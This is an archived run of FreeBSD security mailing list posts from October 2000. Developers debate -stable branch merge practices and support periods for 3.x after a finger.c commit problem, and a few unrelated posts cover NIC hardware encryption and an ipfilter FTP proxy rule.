Date: Tue, 03 Oct 2000 16:32:58 -0700
To: obrien@FreeBSD.org
Cc: Warner Losh, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: cvs commit: src/usr.bin/finger finger.c
In-Reply-To: <20001003123347.C3076@dragon.nuxi.com>
Message-Id: <200010032332.e93NWwH17285@netplex.com.au>

"David O'Brien" wrote:
> On Tue, Oct 03, 2000 at 10:58:30AM -0600, Warner Losh wrote:
> > We used to be really good about this and as we've grown the cautious
> > merge into -stable ethic has become diluted. It is time to tighten
> > things down for a while again. The finger thing has shown that the
> > current practices are too loose.
>
> And the only way to return to this is to put peer pressure on committers
> who MFC too quick.

I know I am guilty of this sometimes, but yes. More care and patience is IMHO the best solution. Things that have potential remote access exposure could probably have stronger requirements. (again IMHO).

Cheers,
-Peter
--
Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au
"All of this is for nothing if we don't go to the stars" - JMS/B5

From owner-freebsd-security Tue Oct 3 16:35:41 2000
From: Brian Somers
Date: Wed, 04 Oct 2000 00:30:22 +0100
To: Paul Richards
Cc: Jordan Hubbard, Christopher Masto, Warner Losh, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org, brian@Awfulhak.org
Subject: Re: cvs commit: src/usr.bin/finger finger.c
In-Reply-To: Message from Paul Richards of "Tue, 03 Oct 2000 23:40:21 BST." <39DA6055.594B13E4@originative.co.uk>
Message-Id: <200010032330.e93NUNs35249@hak.lan.Awfulhak.org>

> > If it's now part of your full-time hattism to worry about this then I
> > hope you'll start spending some number of hours each day in reviewing
> > each and every change which goes into -stable. However many other
>
> I think you're looking at it the wrong way around. The stable team
> wouldn't be putting in a lot of hours reviewing stable commits. Stable
> commits would only occur if the stable team did them i.e. no-one else
> would be allowed to commit to stable. The stable team would then monitor
> -current, noting commits that are bug fixes, and slating them for a MFC
> at a later date when it's felt they've had enough of a shakeout.

I don't think that'd be a good idea - it'd just give this ``stable team'' too much to do. They wouldn't have a chance of identifying everything that's an MFC candidate. IMHO it would be far more practical to have them review/commit/deny submissions from others instead.

> Paul Richards
> FreeBSD Services Ltd

--
Brian

Don't _EVER_ lose your sense of humour !

From owner-freebsd-security Tue Oct 3 16:44:14 2000
From: Alfred Perlstein
Date: Tue, 3 Oct 2000 16:42:37 -0700
To: Peter Wemm
Cc: Jonathan Lemon, Paul Richards, Jordan Hubbard, Christopher Masto, Warner Losh, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001003164236.Q27736@fw.wintelcom.net>
References: <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au>
In-Reply-To: <200010032326.e93NQ7H17213@netplex.com.au>; from peter@netplex.com.au on Tue, Oct 03, 2000 at 04:26:07PM -0700

* Peter Wemm [001003 16:30] wrote:
> Jonathan Lemon wrote:
> >
> > Uh. If only the "-stable" team were allowed to commit to -stable,
> > then it would quickly become the -stale branch. I think that we had
> > this at one point with 3.X, and there were lots of complaints.
>
> Yes, this is what happened with 3.x and it was a disaster. We must not
> let this happen again.
>

There's a large difference between kernel and userland here, kernel changes need to be backported relatively quickly while userland can allow for a longer test period. Separate policies may serve us better than one that covers the entire tree.

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."

From owner-freebsd-security Tue Oct 3 16:54:46 2000
From: Jordan Hubbard
Date: Tue, 03 Oct 2000 16:54:21 -0700
To: Paul Richards
Cc: Christopher Masto, Warner Losh, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: cvs commit: src/usr.bin/finger finger.c
In-Reply-To: Message from Paul Richards of "Tue, 03 Oct 2000 23:40:21 BST." <39DA6055.594B13E4@originative.co.uk>
Message-ID: <84077.970617261@winston.osd.bsdi.com>

> I think you're looking at it the wrong way around. The stable team
> wouldn't be putting in a lot of hours reviewing stable commits.
Fine, change "reviewing" to "doing" and my original point still holds. How many hours are you and the other developers who volunteer willing to commit to this? That's all I want to know and it's a reasonable question to ask.

I'm also not just asking this to be a hard-ass, I've had some serious problems over the last 7 years with getting people to actually put their commit bits where their mouths are when it comes to responding to MFC requests (which do occur) and doing them in a sane and timely fashion for -stable. My experience with the committees we've set up to do such things is also that they don't tend to work over the long term, the rest of the project's expectations quickly becoming desynched with the realities of the situation and leading in turn to accusations of sloth and general finger-pointing.

I'm not saying that it's absolutely impossible for such groups to work, simply that history has not shown their effectiveness in the most favorable light so far and any working group(s) this project may create will have to fight an uphill battle to overcome this.

- Jordan

From owner-freebsd-security Tue Oct 3 16:57:57 2000
From: Brett Glass
Date: Tue, 03 Oct 2000 17:55:55 -0600
To: Alfred Perlstein, Peter Wemm
Cc: Jonathan Lemon, Paul Richards, Jordan Hubbard, Christopher Masto, Warner Losh, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
In-Reply-To: <20001003164236.Q27736@fw.wintelcom.net>
References: <200010032326.e93NQ7H17213@netplex.com.au> <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au>
Message-Id: <4.3.2.7.2.20001003175130.043dc4c0@localhost>

At 05:42 PM 10/3/2000, Alfred Perlstein wrote:
> There's a large difference between kernel and userland here, kernel
> changes need to be backported relatively quickly while userland
> can allow for a longer test period. Separate policies may serve
> us better than one that covers the entire tree.

What about root compromises in userland -- e.g. in setuid apps, daemons that run (or at least start) as root, etc.? It seems to me that the urgency of backporting a fix has more to do with the potential risk one incurs by running the unfixed code, rather than with which "ring" the code is in.

--Brett

From owner-freebsd-security Tue Oct 3 17:05:26 2000
From: Paul Richards
Date: Wed, 04 Oct 2000 01:05:11 +0100
To: Jordan Hubbard
Cc: Christopher Masto, Warner Losh, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: cvs commit: src/usr.bin/finger finger.c
References: <84077.970617261@winston.osd.bsdi.com>
Message-ID: <39DA7437.EAD39E03@originative.co.uk>

Jordan Hubbard wrote:
>
> > I think you're looking at it the wrong way around. The stable team
> > wouldn't be putting in a lot of hours reviewing stable commits.
>
> Fine, change "reviewing" to "doing" and my original point still holds.
> How many hours are you and the other developers who volunteer willing
> to commit to this? That's all I want to know and it's a reasonable
> question to ask.

Personally I'm willing to do this full time.

> I'm not saying that it's absolutely impossible for such groups to
> work, simply that history has not shown their effectiveness in the
> most favorable light so far and any working group(s) this project may
> create will have to fight an uphill battle to overcome this.
At the moment I can't see it working either since there's a strong feeling from one side of the project that -stable should be closer to the bleeding edge than the other side of the project would like and until that is resolved any group of people trying to monitor what goes into -stable is going to fall foul of one set of opinions or the other. Paul Richards FreeBSD Services Ltd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 17:23: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 2828137B502; Tue, 3 Oct 2000 17:22:55 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e940MeX84226; Tue, 3 Oct 2000 17:22:40 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Paul Richards Cc: Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: Message from Paul Richards of "Wed, 04 Oct 2000 01:05:11 BST." <39DA7437.EAD39E03@originative.co.uk> Date: Tue, 03 Oct 2000 17:22:39 -0700 Message-ID: <84222.970618959@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > At the moment I can't see it working either since there's a strong > feeling from one side of the project that -stable should be closer to > the bleeding edge than the other side of the project would like and > until that is resolved any group of people trying to monitor what goes > into -stable is going to fall foul of one set of opinions or the other. Watching this discussion's highlights (lowlights? 
:) so far, I'd actually have to say that I'm tempted to go back and call for a revision of our existing policy which states that any -stable release more than 2 releases old is desupported. I was one of the authors of that policy and can only say that it seemed like a good idea at the time given the relatively small number of engineers we had and the frequent fights over unrealistic expectations that were occuring in the mailing lists. Nowadays we have a lot more engineers, however, and a lot more "customers" who are still running releases like 3.4 and would like *some* measure of support. I would therefore like to propose the following: We change the wording of our policy to state that upgrading to something within two releases of the "current -stable" product is the *recommended* action but that we will continue to provide, WHERE POSSIBLE, support for older branches of FreeBSD. We also stop telling people running 3.x (or whatever our "older -stable" might be at any given time) that they have to upgrade to receive any support at all and, instead, handle their queries on a case by case basis to see if it's possible for us to just whack whatever problem they might have over the head in the relevant branch and ask them to simply upgrade to the head of that branch. In cases where that's just not possible, we then ask them to jump up a branch. We could also look into providing an "update" command or something which would pull either sources or binaries over from a snapshot box and make the process of getting up to the branch-head a lot easier. It's long been on my wishlist and I'm at the point where I'd be willing to devote some BSDi resources to both writing the software and setting up a build box for creating the relevant binaries on an ongoing basis. This would seem to me to give us the best of all possible worlds. 
That portion of our customer base which wants a truly moribund -stable with just security enhancements and "by special request" fixes could have that by lagging back a branch. The other portion which wants a more active -stable could subscribe to the most current -stable. The final remaining portion which enjoys watching their blood come out in arterial spurts could subscribe to -current. :) What say? - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 17:34:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C672537B502; Tue, 3 Oct 2000 17:34:14 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA79033; Tue, 3 Oct 2000 17:34:14 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Tue, 3 Oct 2000 17:34:14 -0700 From: Kris Kennaway To: Jordan Hubbard Cc: Paul Richards , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003173414.A58372@freefall.freebsd.org> References: <84222.970618959@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <84222.970618959@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Tue, Oct 03, 2000 at 05:22:39PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 05:22:39PM -0700, Jordan Hubbard wrote: > I would therefore like to propose the following: We change the wording > of our policy to state that upgrading to something within two releases > of the "current -stable" product is the *recommended* action but that > we will 
continue to provide, WHERE POSSIBLE, support for older
> branches of FreeBSD. We also stop telling people running 3.x (or

I suggest that in practice it will be all but impossible for people to get active bugfix support for 3.x, and we'd probably be giving a false impression if we say otherwise. If some of the developers really plan to devote significant efforts towards supporting 3.x (or whatever "dead branch of the month" we have), let them do so for 3 or 4 months to prove their ability to do so, and if it's actually worked by the end of the trial period then we can officially change the published policy.

Speaking for myself as part of the security team, I don't want to support 3.x for security fixes any more, since it's been just too damn hard to do that over the past few months (i.e. in fact we haven't been providing good security support because developers aren't backporting security fixes), and as warner pointed out we've now passed our "3 releases along a branch" cutoff policy. Again, if someone else is going to step up and commit to fixing problems in 3.x I'll work with them (i.e. give them an advisory prerelease and release deadline to get the fix merged by, and if they miss it, too bad), but I would prefer not to do this myself for time constraints.

I think I'd like to formally announce this unless someone steps up to the plate with the above.

Kris
--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 17:43:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id BB0B137B502; Tue, 3 Oct 2000 17:43:21 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e940hDw18516; Tue, 3 Oct 2000 17:43:13 -0700 (PDT) Date: Tue, 3 Oct 2000 17:43:13 -0700 From: Alfred Perlstein To: Jordan Hubbard Cc: Paul Richards , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003174313.U27736@fw.wintelcom.net> References: <84222.970618959@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <84222.970618959@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Tue, Oct 03, 2000 at 05:22:39PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Jordan Hubbard [001003 17:23] wrote: > > We could also look into providing an "update" command or something > which would pull either sources or binaries over from a snapshot box > and make the process of getting up to the branch-head a lot easier. > It's long been on my wishlist and I'm at the point where I'd be > willing to devote some BSDi resources to both writing the software > and setting up a build box for creating the relevant binaries on an > ongoing basis. You ought to go to the cube next to you, Mike Smith said he had something along the lines of that, er, something that would generate a binary delta that could be spammed over an existing install. 
> This would seem to me to give us the best of all possible worlds. > That portion of our customer base which wants a truly moribund -stable > with just security enhancements and "by special request" fixes could > have that by lagging back a branch. The other portion which wants a > more active -stable could subscribe to the most current -stable. The > final remaining portion which enjoys watching their blood come out in > arterial spurts could subscribe to -current. :) > > What say? I think supporting back to 3.x is a good idea. It's pretty harsh to be telling users to bugger off when we've only just released 4.0 6 months ago and they're stuck with 3.x. I'd love to see a couple of committers come on board with the explicit job of backporting important fixes, perhaps in passing people interested in the project we could offer a backporting position as a starter or full time post sort of like the ports team. Might I suggest it'd be pretty helpful to have a couple of speedy 3.x (and probably 4.x) boxes set up some place with console access to make these types of fixes easier for our developers lacking in hardware resources. Running them off a private net behind freefall would work pretty well no? -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Oct 3 18: 1:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from delivery.insweb.com (delivery.insweb.com [12.16.212.64]) by hub.freebsd.org (Postfix) with ESMTP id 4E29B37B66E; Tue, 3 Oct 2000 18:01:29 -0700 (PDT) Received: from ursine.com (dhcp4-202.secure.insweb.com [192.168.4.202]) by delivery.insweb.com (8.9.2/8.9.3) with ESMTP id SAA92029; Tue, 3 Oct 2000 18:01:28 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Message-ID: <39DA81E9.FD461622@ursine.com> Date: Tue, 03 Oct 2000 18:03:37 -0700 From: Michael Bryan X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] References: <84222.970618959@winston.osd.bsdi.com> <20001003173414.A58372@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Kris Kennaway wrote:
>
> On Tue, Oct 03, 2000 at 05:22:39PM -0700, Jordan Hubbard wrote:
>
> > I would therefore like to propose the following: We change the wording
> > of our policy to state that upgrading to something within two releases
> > of the "current -stable" product is the *recommended* action but that
> > we will continue to provide, WHERE POSSIBLE, support for older
> > branches of FreeBSD. We also stop telling people running 3.x (or

I like this. A lot.

> I suggest that in practice it will be all but impossible for people to
> get active bugfix support for 3.x, and we'd probably be giving a false
> impression if we say otherwise.
> [...]
> Speaking for myself as part of the security team, I don't want to > support 3.x for security fixes any more, since it's been just too damn > hard to do that over the past few months (i.e. in fact we havent been > providing good security support because developers aren't backporting > security fixes), and as warner pointed out we've now passed our "3 > releases along a branch" cutoff policy. Well, it's been said before, but I'll add my two cents to this. Support for at least security-related issues really needs to be provided for a reasonable duration, probably about a year, maybe longer, after a release comes out. Some production environments need (or at least strongly desire) this in order to more cautiously roll out full-on upgrades in a more planned mode of operation, where planning/testing/rollout can take many months, up to a significant part of a year. Shortcuts/quickfixes can be done in a more timely fashion when an urgent problem can be fixed with a relatively isolated patch or utility update, but that's frequently much harder to get approved when you're talking about a full upgrade that touches a lot more of the system. Having a cutoff based on number of releases just isn't realistic for the way a lot of production sites operate, not when the releases come out in relatively quick succession. 4.0 came out in March, and 4.1 in July. A lot of sites are hesitant to upgrade to any x.0 point release (whether or not FreeBSD warrants that caution is a separate issue, it -is- a real concern a lot of companies face and have been burned by.) So it's extremely unrealistic to tell them "Yes, you rolled out 3.5 in June when it first came out, but now you have to do a major upgrade to 4.x to get security fix 'foobar', even though your schedule for rollout says you were going to do it in November/December". 
:-/

If FreeBSD does -not- do this, I strongly feel that a lot of potential users of it will simply say "Sorry, we need at least one year of critical bug/security fix support on any given release tree, so we'll go with somebody who can give us that."

I know this has been discussed before, but since Jordan has stepped up to the plate with what I think is an extremely realistic and workable framework for release support, I wanted to try to make sure that gets supported, and not shot down.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Oct 3 18:13:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from nameserver.austclear.com.au (nameserver.austclear.com.au [192.83.119.132]) by hub.freebsd.org (Postfix) with ESMTP id 06EE837B503; Tue, 3 Oct 2000 18:13:03 -0700 (PDT) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.70.1]) by nameserver.austclear.com.au (8.9.3/8.9.3) with ESMTP id MAA71502; Wed, 4 Oct 2000 12:12:56 +1100 (EST) Received: from tungsten (tungsten [192.168.70.1]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id MAA25657; Wed, 4 Oct 2000 12:12:56 +1100 (EST) Message-Id: <200010040112.MAA25657@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: freebsd-hardware@freebsd.org Cc: freebsd-security@freebsd.org Subject: Intel PRO/100 S NIC support Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Oct 2000 12:12:55 +1100 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Has anyone tried using an Intel PRO/100 S card under FreeBSD? It has hardware encryption, and I was just wondering whether it can be used by FreeBSD and if so how fast it is--the Intel Web site seems very vague and I'm learning that my idea of fast is substantially different to, say, Cisco with their VPN routers...
Thanks, Tony -- Tony Landells Systems Manager Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 18:31: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.hellasnet.gr (mail.hellasnet.gr [212.54.192.3]) by hub.freebsd.org (Postfix) with ESMTP id A046237B502; Tue, 3 Oct 2000 18:30:53 -0700 (PDT) Received: from hades.hell.gr (ppp1.patr.hellasnet.gr [212.54.197.16]) by mail.hellasnet.gr (8.9.1/8.9.1) with ESMTP id AAA17581; Wed, 4 Oct 2000 00:31:25 -0200 (GMT) Received: (from charon@localhost) by hades.hell.gr (8.11.0/8.11.0) id e941Ova27289; Wed, 4 Oct 2000 04:24:57 +0300 (EEST) Date: Wed, 4 Oct 2000 04:24:57 +0300 From: Giorgos Keramidas To: Brian Somers Cc: Paul Richards , Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004042457.A24642@hades.hell.gr> References: <200010032330.e93NUNs35249@hak.lan.Awfulhak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010032330.e93NUNs35249@hak.lan.Awfulhak.org>; from brian@Awfulhak.org on Wed, Oct 04, 2000 at 12:30:22AM +0100 X-PGP-Fingerprint: 3A 75 52 EB F1 58 56 0D - C5 B8 21 B6 1B 5E 4A C2 X-URL: http://students.ceid.upatras.gr/~keramida/index.html Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 12:30:22AM +0100, Brian Somers wrote: > > I don't think that'd be a good idea - it'd just give this ``stable > team'' too much to do. They wouldn't have a chance of identifying > everything that's an MFC candidate. 
IMHO it would be far more
> practical to have them review/commit/deny submissions from others
> instead.

Even people that are not in a separate ``stable team'' can contribute to testing of new features, and making sure that everything that is MFC'ed to -stable is working as it was expected.

While reading this thread tonight, I went and created a special procmail rule in my filters to leave a separate copy of the messages that are sent to cvs-all and contain the string "MFC: " in their body, into a separate folder called freebsd-cvs-mfc. Having all the commit messages in a folder like that will constantly remind me that these things are already into -stable, and that I should spend some time testing them to see how `stable' they are.

Jordan is very right in one thing he said: Keeping -stable stable should be everyone's job, and making that an actual reality rather than just a statement would go a long ways towards preventing what just happened from happening again. I think that spending some time reading the MFC messages separately and testing those features that I can, and sending my results on this list, is a Good Thing(TM).

Unless anyone dislikes this test-the-merges-after-they-re-done practice, I think I will spend a few hours a day testing -stable things and helping make them more -stable :)

--
Giorgos Keramidas, < keramida @ ceid . upatras . gr >

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Oct 3 18:32:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from cdrrdslgw2poolA156.cdrr.uswest.net (cdrrdslgw2poolA156.cdrr.uswest.net [63.228.160.156]) by hub.freebsd.org (Postfix) with ESMTP id 2A78137B502 for ; Tue, 3 Oct 2000 18:32:29 -0700 (PDT) Received: (from dean@localhost) by deanstoy.home.uswest.net (8.11.0/8.9.2) id e930qih84096; Mon, 2 Oct 2000 19:52:44 -0500 (CDT) (envelope-from dean) Date: Mon, 2 Oct 2000 19:52:44 -0500 (CDT) From: "Dean M.
Phillips" Message-Id: <200010030052.e930qih84096@deanstoy.home.uswest.net> To: buliwyf@libertad.univalle.edu.co Cc: security@FreeBSD.ORG In-reply-to: (buliwyf@libertad.univalle.edu.co) Subject: Re: NATD and ipf Reply-To: deanmphillips@uswest.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I use a line like

    map tun0 0/0 -> 0/32 proxy port ftp ftp/tcp

to open a small hole in the firewall for the incoming data connection.

--
Dean M. Phillips deanmphillips@uswest.net Office: 319-295-0407 Home: 319-373-9825

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Oct 3 18:52:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 001C337B502; Tue, 3 Oct 2000 18:52:03 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13gdiy-00014I-00; Tue, 03 Oct 2000 20:52:00 -0500 Date: Tue, 3 Oct 2000 20:51:59 -0500 From: Ade Lovett To: Alfred Perlstein Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003205159.A20891@FreeBSD.org> References: <84222.970618959@winston.osd.bsdi.com> <20001003174313.U27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001003174313.U27736@fw.wintelcom.net>; from bright@wintelcom.net on Tue, Oct 03, 2000 at 05:43:13PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

[cc's trimmed a little]

On Tue, Oct 03, 2000 at 05:43:13PM -0700, Alfred Perlstein wrote:
> Might I suggest it'd be pretty helpful to have a couple of speedy
> 3.x (and probably 4.x) boxes set up some place with console access
> to make these types of fixes easier for our
developers lacking in > hardware resources. What about ports? How do you propose that they be tested, as opposed to "it-compiles-so-ship-it" on these 3.x boxes if, say, the developer in question only runs 4.x boxes, with a single not-yet-built 5.x box for when 5.x settles down? Or can we stick with the current ports policy of tracking -stable and -current only, with a good luck to everyone else? And what does this policy mean anyway when we have two -stables, with the package building cluster building for three environments? -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19: 3:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 5EF6837B502; Tue, 3 Oct 2000 19:03:34 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e9423YH21170; Tue, 3 Oct 2000 19:03:34 -0700 (PDT) Date: Tue, 3 Oct 2000 19:03:34 -0700 From: Alfred Perlstein To: Ade Lovett Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003190333.Y27736@fw.wintelcom.net> References: <84222.970618959@winston.osd.bsdi.com> <20001003174313.U27736@fw.wintelcom.net> <20001003205159.A20891@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <20001003205159.A20891@FreeBSD.org>; from ade@FreeBSD.org on Tue, Oct 03, 2000 at 08:51:59PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Ade Lovett [001003 18:52] wrote: > [cc's trimmed a little] > > On Tue, Oct 03, 2000 at 05:43:13PM -0700, Alfred Perlstein wrote: > > Might I suggest 
it'd be pretty helpful to have a couple of speedy > > 3.x (and probably 4.x) boxes set up some place with console access > > to make these types of fixes easier for our developers lacking in > > hardware resources. > > What about ports? How do you propose that they be tested, as opposed > to "it-compiles-so-ship-it" on these 3.x boxes if, say, the developer > in question only runs 4.x boxes, with a single not-yet-built 5.x box > for when 5.x settles down? > > Or can we stick with the current ports policy of tracking -stable > and -current only, with a good luck to everyone else? And what does > this policy mean anyway when we have two -stables, with the package > building cluster building for three environments? I think the current ports situation is fine, personally I'd love to see most ports that have existed since a specific branch continue to work on those branches, but that's not very realistic of me. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19: 7:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id B48F237B66E; Tue, 3 Oct 2000 19:07:44 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e9427fX85382; Tue, 3 Oct 2000 19:07:41 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Kris Kennaway Cc: Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: Message from Kris Kennaway of "Tue, 03 Oct 2000 17:34:14 PDT." 
<20001003173414.A58372@freefall.freebsd.org> Date: Tue, 03 Oct 2000 19:07:41 -0700 Message-ID: <85378.970625261@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> I suggest that in practise it will be all but impossible for people to
> get active bugfix support for 3.x, and we'd probably be giving a false
> impression if we say otherwise.

